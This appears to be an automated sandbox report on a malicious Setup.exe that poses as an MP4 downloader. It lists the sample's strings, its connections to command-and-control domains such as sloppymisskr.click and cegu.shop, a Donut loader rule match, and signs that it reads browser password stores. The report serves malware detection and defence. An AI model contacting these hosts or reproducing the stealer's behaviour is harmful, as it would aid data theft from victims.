content="<meta name="twitter:title" content="<meta property="og:image:secure_url" content="<meta name="twitter:image:src" content="<meta name="twitter:image" content="%s\ServicesJSX_duk.exeJSX_SM.dllJSX_V8.dllMediaLanguages%s\Python-32\python.exe%s\Python-64\python.exehttps:/</article><article</table><table<link<meta/div<div</style><style><script</body><body></head><head></html><html>/MPD><MPD.hlsCXMediaSearchThumbnailDownloadThreadl equals www.yahoo.com (Yahoo)
              Source: Setup.exeString found in binary or memory: zcABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$%3Dsig?n=;n=&n=?sig=?signature=;sig=;signature=&sig=&signature=<INPUT>%s\youtube.com-n.js%s\youtube.com-sig.js%s/youtube.com-n.jshttp://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar %s%s; input="<INPUT>"; output=%s(input); console.log(output);Decipher_n=function(enhanced_except_var %s={%s};var var %s=function(a){%s}; input="<INPUT>"; output=%s(input); console.log(output);Decipher_sig;a=a.split("")jsUrlWEB_PLAYER_CONTEXT_CONFIG_ID_KEVLAR_WATCHWEB_PLAYER_CONTEXT_CONFIGSPLAYER_JS_URLXSRF_TOKENXSRF_FIELD_NAMEVISITOR_DATASIGNIN_URLSERVER_NAMEPAGE_CLPAGE_BUILD_LABELLOGGED_INclient.nameLATEST_ECATCHER_SERVICE_TRACKING_PARAMSuserInterfaceThemeINNERTUBE_CONTEXTINNERTUBE_CONTEXT_HLINNERTUBE_CONTEXT_GLINNERTUBE_CONTEXT_CLIENT_VERSIONINNERTUBE_CONTEXT_CLIENT_NAMEINNERTUBE_CLIENT_VERSIONINNERTUBE_CLIENT_NAMEINNERTUBE_API_VERSIONINNERTUBE_API_KEYplayerParamswatchEndpointnavigationEndpointswebPrefetchDatawebResponseContextExtensionDataresponseContextbrowseEndpointnavigationEndpointfeaturedChannelplayerAnnotationsExpandedRendererannotationstrackingParamsisPrivateauthorviewCountshortDescriptionchannelIdcontextParamsplayabilityStatusoriginalUrljsUrlresponseContextytInitialData =playabilityStatusytInitialPlayerResponse ="playabilityStatus":"videoDetails":"streamingData":"captions":https://www.google.com/Google Searchgoogle.searchgoogle.com/url?url=https://www.yahoo.com/Yahoo Searchyahoo.searchvideo.search.yahoo.comrurl=youtube.com.InnerTubeyoutube.com.WebPageContentComponentVIDEOpornhubfacebookextractorvcodecextHTML5JWPlayerposter="audio/wavaudio/oggaudio/mpeg<audio</audio>https://%s%saddParam('flashvars',addParam("flashvars",var videoFile="var videoFile='var filepath = "var filepath = 'jwplayermp4aavc1av1vp9vorbisvp8h264Auto close within 00:%02dEnglishTranslatedOriginalCodeLanguages1.0.0M3U8<meta name="title" 
content="<meta name="twitter:title" content="<meta property="og:image:secure_url" content="<meta name="twitter:image:src" content="<meta name="twitter:image" content="%s\ServicesJSX_duk.exeJSX_SM.dllJSX_V8.dllMediaLanguages%s\Python-32\python.exe%s\Python-64\python.exehttps:/</article><article</table><table<link<meta/div<div</style><style><script</body><body></head><head></html><html>/MPD><MPD.hlsCXMediaSearchThumbnailDownloadThreadl equals www.youtube.com (Youtube)
              Source: global traffic | DNS traffic detected: DNS query: sloppymisskr.click
              Source: global traffic | DNS traffic detected: DNS query: cegu.shop
              Source: unknown | HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: sloppymisskr.click
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Setup.exe | String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: Setup.exe, Setup.exe, 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Setup.exe | String found in binary or memory: http://crl.starfieldtech.com/repository/0
              Source: Setup.exe | String found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
              Source: Setup.exe | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Setup.exe | String found in binary or memory: http://ocsp.starfieldtech.com/0D
              Source: Setup.exe | String found in binary or memory: http://ocsp.thawte.com0
              Source: Setup.exe | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: Setup.exe | String found in binary or memory: http://s2.symcb.com0
              Source: Setup.exe | String found in binary or memory: http://sf.symcb.com/sf.crl0f
              Source: Setup.exe | String found in binary or memory: http://sf.symcb.com/sf.crt0
              Source: Setup.exe | String found in binary or memory: http://sf.symcd.com0&
              Source: Setup.exe | String found in binary or memory: http://sv.symcb.com/sv.crl0W
              Source: Setup.exe | String found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: Setup.exe | String found in binary or memory: http://sv.symcd.com0&
              Source: Setup.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: Setup.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: Setup.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: Setup.exe | String found in binary or memory: http://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar
              Source: Setup.exe | String found in binary or memory: http://www.symauth.com/cps0(
              Source: Setup.exe | String found in binary or memory: http://www.symauth.com/rpa00
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1851630664.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Setup.exe | String found in binary or memory: https://api.github.com/repos/ytdl-org/ytdl-nightly/releases/latestMX_ytdlbrowser_download_urlyoutube
              Source: Setup.exe | String found in binary or memory: https://cdn-fck.tnaflix.com/tnaflix/%s.fid?key=%s&VID=%s&nomp4=1&catID=0&rollover=1&startThumb=%s&em
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop//
              Source: Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/1B
              Source: Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/4Q
              Source: Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045052270.0000000003571000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120455837.0000000002ADB000.00000004.00000010.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120658111.000000000357D000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094172559.000000000357C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop/8574262446/ph.txt/P
              Source: Setup.exe, 00000000.00000002.4119493222.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044825543.000000000078C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045011086.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cegu.shop:443/8574262446/ph.txt
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Setup.exe | String found in binary or memory: https://d.symcb.com/cps0%
              Source: Setup.exe | String found in binary or memory: https://d.symcb.com/rpa0
              Source: Setup.exe, Setup.exe, 00000000.00000002.4119493222.0000000000796000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044825543.000000000078C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044975990.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120702904.0000000003594000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045011086.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3045122596.0000000003593000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044550396.0000000003592000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094519509.0000000003591000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Setup.exe | String found in binary or memory: https://hotmovs.comhttps://www.hqporner.com/hqpornerhqporner.com
              Source: Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtf1
              Source: Setup.exe, 00000000.00000003.2094437159.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834336363.0000000003582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sloppymisskr.click/
              Source: Setup.exe, 00000000.00000003.1870829227.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sloppymisskr.click/$
              Source: Setup.exe, Setup.exe, 00000000.00000003.1892472910.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1902947617.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sloppymisskr.click/api
              Source: Setup.exe, 00000000.00000003.3044975990.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119561424.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094224037.00000000007EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sloppymisskr.click/apiE
              Source: Setup.exe, 00000000.00000003.1917452260.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903114467.0000000003568000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sloppymisskr.click/apiW
              Source: Setup.exe, 00000000.00000003.1864396067.0000000000789000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sloppymisskr.click/apib
              Source: Setup.exe, 00000000.00000003.1917452260.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sloppymisskr.click/apie
              Source: Setup.exe, 00000000.00000003.1892306082.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1917452260.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2094324102.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4120573743.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903114467.0000000003568000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sloppymisskr.click/apisp
              Source: Setup.exe, 00000000.00000003.1902947617.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sloppymisskr.click/apiy
              Source: Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119539930.00000000007E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sloppymisskr.click/b6
              Source: Setup.exe, 00000000.00000003.2094224037.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4119539930.00000000007E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sloppymisskr.click/panym
              Source: Setup.exe, 00000000.00000003.1822159529.00000000035D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Setup.exe, 00000000.00000003.1834178767.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822159529.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822224930.00000000035C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Setup.exe, 00000000.00000003.1822224930.00000000035A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Setup.exe, 00000000.00000003.1834178767.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822159529.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822224930.00000000035C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Setup.exe, 00000000.00000003.1822224930.00000000035A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Setup.exe | String found in binary or memory: https://vivporn.com/wp-content/plugins/
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: Setup.exe | String found in binary or memory: https://www.eporner.com/EPORNEReporner.comeporner.cdn.eporner.comhttps://www.eporner.com/video-%s//&
              Source: Setup.exe | String found in binary or memory: https://www.eporner.com/xhr/video/%s?hash=%s&device=generic&domain=www.eporner.com&fallback=falsevar
              Source: Setup.exe | String found in binary or memory: https://www.google.com/Google
              Source: Setup.exe, 00000000.00000003.1821183132.00000000035BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Setup.exe | String found in binary or memory: https://www.handjobhub.com/HandjobHubhandjobhub.comhandjobhub.cdn.handjobhub.comsrc=
              Source: Setup.exe | String found in binary or memory: https://www.hotmovs.com/
              Source: Setup.exe | String found in binary or memory: https://www.hotmovs.tube/hotmovs.comhotmovs.tubeis_defaultvideo_urlhttps://hotmovs.com/api/videofile
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Setup.exe, 00000000.00000003.1852703245.000000000381E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: Setup.exe | String found in binary or memory: https://www.redtube.com/RedTuberedtube.comredtube.https://www.redtube.com/%sid=/player/?id=?id=
              Source: Setup.exe | String found in binary or memory: https://www.redtube.com/videohttps://www.thumbzilla.com/Thumbzillathumbzilla.comthumbzilla.
              Source: Setup.exe | String found in binary or memory: https://www.tnaflix.com/Tnaflixtnaflix.comtnaflix.
              Source: Setup.exe | String found in binary or memory: https://www.tomabo.com/mp4-player/download.html
              Source: Setup.exe | String found in binary or memory: https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.com/mp4-playerhttps://www.tomabo.c
              Source: Setup.exe | String found in binary or memory: https://www.tomabo.com/videos/dog-and-balls.mp4Please
              Source: Setup.exe | String found in binary or memory: https://www.tomabo.comVersion
              Source: Setup.exe | String found in binary or memory: https://www.txxx.com/
              Source: Setup.exe | String found in binary or memory: https://www.txxx.tube/Txxxtxxx.comtxxx.tubehttps://txxx.com/api/videofile.php?video_id=%s&lifetime=%
              Source: Setup.exe | String found in binary or memory: https://www.yahoo.com/Yahoo
              Source: Setup.exe | String found in binary or memory: https://www.youtube.com/%I64d-%I64d-%I64d0-%I64dContent-Type:
              Source: Setup.exe | String found in binary or memory: https://www.youtube.com/playlist?list=%shttps://i.ytimg.com/vi/%s/maxresdefault.jpghttps://i.ytimg.c
              Source: Setup.exe | String found in binary or memory: https://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999lengthSecondshlsManife
              Source: Setup.exe | String found in binary or memory: https://www.youtube.com/watch?v=Zk9J5xnTVMAZk9J5xnTVMAPlease
              Source: Setup.exe | String found in binary or memory: https://www.youtube.com/youtubei/v1/browse?key=%s&prettyPrint=falseX-Goog-Visitor-Idcontinuationclic
              Source: Setup.exe | String found in binary or memory: https://www.youtube.com/youtubei/v1/player?key=%s&prettyPrint=falseOriginX-Youtube-Client-VersionX-Y
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49754 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.90.109:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2

              System Summary

              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\Setup.exe | Process Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_3_03567417
              Source: Setup.exe | Static PE information: invalid certificate
              Source: Setup.exe, 00000000.00000000.1669426879.000000000067F000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMP4Downloader.EXE vs Setup.exe
              Source: Setup.exe, 00000000.00000003.1789823062.0000000002D66000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMP4Downloader.EXE vs Setup.exe
              Source: Setup.exe | Binary or memory string: OriginalFilenameMP4Downloader.EXE vs Setup.exe
              Source: Setup.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 00000000.00000002.4119881212.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
              Source: Setup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Setup.exe, 00000000.00000003.1821440058.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1822304760.000000000357C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Setup.exeReversingLabs: Detection: 15%
              Source: Setup.exeVirustotal: Detection: 8%
              Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sfc.dllJump to behavior
